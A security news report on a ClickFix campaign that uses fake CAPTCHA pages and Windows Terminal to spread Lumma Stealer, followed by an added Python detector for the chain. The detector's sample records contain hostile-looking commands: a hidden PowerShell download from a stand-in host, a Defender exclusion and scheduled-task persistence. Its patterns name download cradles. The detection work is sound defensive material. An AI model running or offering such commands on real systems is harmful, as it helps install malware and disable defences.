Threat actors have been abusing the Windows Terminal app to distribute the Lumma Stealer malware as part of a sweeping ClickFix campaign first observed last month, according to The Hacker News.

The intrusions lure targets into opening Windows Terminal with the Windows+X, I keyboard sequence (Win+X opens the Quick Link menu, and I selects Terminal) and pasting a malicious PowerShell command presented to them by a phony CAPTCHA page, the Microsoft Threat Intelligence team said in a series of posts on X. The pasted command spawns additional Windows Terminal or PowerShell instances and launches another PowerShell process that retrieves a ZIP payload along with a renamed 7-Zip binary. That archive and extractor are then used to fetch further payloads, establish scheduled task-based persistence, configure Microsoft Defender exclusions, exfiltrate machine and network data, and deploy Lumma Stealer.

A second attack chain used a command pasted into Windows Terminal to download a batch script that is executed via cmd.exe. "The script connects to crypto blockchain RPC endpoints, indicating an EtherHiding technique. It also performs QueueUserAPC()-based code injection into chrome.exe and msedge.exe processes to harvest Web Data and Login Data," said Microsoft.
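The first chain described above leaves a recognisable trail in process-creation telemetry: a shell spawned from Windows Terminal that immediately downloads something, a Defender exclusion being added, a scheduled task being created, and a 7-Zip binary running under a different file name. The following detector is an added example, not code from Microsoft, The Hacker News or SC Media. The records are constructed and modelled loosely on Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, OriginalFileName); the paths, task name and the example.invalid host are made up. It covers only the Windows Terminal/PowerShell chain, not the batch-script and QueueUserAPC() injection chain, which process-creation events alone cannot see.

```python
"""Heuristic detection for the Windows Terminal / ClickFix chain.

Added example, not Microsoft's or SC Media's code. Records are constructed and
modelled loosely on Sysmon Event ID 1 fields; paths, the task name and the
example.invalid host are made up.
"""
import re

TERMINAL_PARENTS = {"windowsterminal.exe", "openconsole.exe", "wt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SEVENZIP_ORIGINALS = {"7z.exe", "7za.exe", "7zg.exe"}

# Command-line patterns for the stages the article lists.
DOWNLOADER = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|"
    r"invoke-expression|\biex\b|-enc(odedcommand)?\b|expand-archive)", re.I)
DEFENDER_EXCLUSION = re.compile(
    r"add-mppreference\b.*-exclusion(path|process|extension)", re.I)
SCHEDULED_TASK = re.compile(
    r"(schtasks(\.exe)?\b.*/create|register-scheduledtask)", re.I)


def _leaf(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_rules(ev):
    """Return the rule names a single process-creation record triggers."""
    image, parent = _leaf(ev.get("Image", "")), _leaf(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    original = ev.get("OriginalFileName", "").lower()
    hits = []
    # Stage 1: a shell launched from Windows Terminal (or from a shell it
    # spawned) whose command line downloads, decodes or expands a payload.
    if image in SHELLS and (parent in TERMINAL_PARENTS or parent in SHELLS) \
            and DOWNLOADER.search(cmd):
        hits.append("terminal_spawned_downloader")
    if image in SHELLS and DEFENDER_EXCLUSION.search(cmd):
        hits.append("defender_exclusion")
    if SCHEDULED_TASK.search(cmd):
        hits.append("scheduled_task_persistence")
    # OriginalFileName comes from the PE version resource, so renaming the
    # 7-Zip binary on disk does not change it.
    if original in SEVENZIP_ORIGINALS and image not in SEVENZIP_ORIGINALS:
        hits.append("renamed_7zip")
    return hits


def summarize(events):
    """Count rule hits across one host's records."""
    counts = {}
    for ev in events:
        for rule in match_rules(ev):
            counts[rule] = counts.get(rule, 0) + 1
    return counts


def is_clickfix_chain(events):
    """True when a terminal-launched downloader is joined by any later stage."""
    counts = summarize(events)
    later = {"defender_exclusion", "scheduled_task_persistence", "renamed_7zip"}
    return "terminal_spawned_downloader" in counts and any(r in counts for r in later)


# Constructed records; the WindowsApps path is simplified and the host is fake.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal\WindowsTerminal.exe",
     "CommandLine": r'powershell -w hidden -ep bypass -c "iwr http://example.invalid/a.zip -OutFile $env:TEMP\a.zip"',
     "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -c "Add-MpPreference -ExclusionPath C:\Users\Public"',
     "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Users\Public\svc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\Public\svc.exe x C:\Users\Public\a.zip -oC:\Users\Public -y",
     "OriginalFileName": "7z.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'schtasks.exe /create /sc minute /mo 15 /tn "Updater" /tr "C:\Users\Public\svc.exe"',
     "OriginalFileName": "schtasks.exe"},
    # Benign: an admin running a cmdlet from Explorer, and another inside Terminal.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile -c Get-ChildItem",
     "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal\WindowsTerminal.exe",
     "CommandLine": "powershell -c Get-Process",
     "OriginalFileName": "PowerShell.EXE"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_leaf(ev["Image"]), match_rules(ev))
    print("chain:", is_clickfix_chain(SAMPLE_EVENTS))
```

The individual rules are noisy on their own (administrators do run Add-MpPreference and schtasks), which is why is_clickfix_chain only fires when the terminal-launched downloader is seen together with at least one later stage; in production the grouping should be per user session rather than per host, and the renamed-7-Zip check depends on OriginalFileName being collected.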